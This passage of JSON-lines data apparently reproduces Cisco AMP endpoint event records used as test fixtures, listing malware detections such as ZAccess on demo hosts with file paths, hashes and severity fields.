Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084313","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":501000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364373045149720","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1089625888-3054005746-3039903294-1000\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":4016,"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":441000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149719","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":149000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182417","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149717","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149716","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182419","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":923000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182418","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":740000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182415","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":717000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182414","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182412","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":606000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182410","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":583000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182409","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182408","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":16000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182406","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900400000800,"timestamp":1610705109,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:05:09+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ZAccess.15nt","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705109,"start_date":"2021-01-15T10:05:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"disposition":"Clean","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255854610743000,"timestamp":1610705106,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:05:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255854610743321","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899799000300,"timestamp":1610705105,"timestamp_nanoseconds":799000000,"date":"2021-01-15T10:05:05+00:00","event_type":"Vulnerable Application 